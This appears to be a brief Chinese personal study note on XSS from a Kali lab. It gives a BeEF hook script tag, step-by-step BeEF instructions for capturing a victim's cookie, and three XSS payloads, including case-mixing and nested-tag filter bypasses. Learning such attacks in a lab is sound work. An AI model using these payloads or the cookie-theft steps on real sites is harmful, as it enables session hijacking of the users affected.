kali 漏洞篇-xss 学习笔记

xss 同源策略

js 外链不受到“同源策略”影响

 

berff-xss

beef盗取cookie

beef-xss(需要手动为kali服务器安装此命令）

<script src="http://127.0.0.1:3000/hook.js"></script>

进入BEEF后我们先点击 Command Browser -> Commands -> 在Searche框输入cookie并回车 -> 进入新的页面后点击右下角Execute->之后点击中间出现的记录 此时我们就可以在右侧看到我们收到的cookie了。 完成全部操作后我们将得到一个格式为： php=xxxxxxxxxx;security=low样式的cookie

# beef 忘记登录账号密码，重置和查看  /etc/beff-xss/config.yaml 里面

 

payload:  

正常方式 <script>alert(1)</script>

大小写方式绕过 <ScRiPt>alert(1)</ScRiPt>

乱排序绕过 <scr<script>ipt>alert(1)</scr<script>ipt>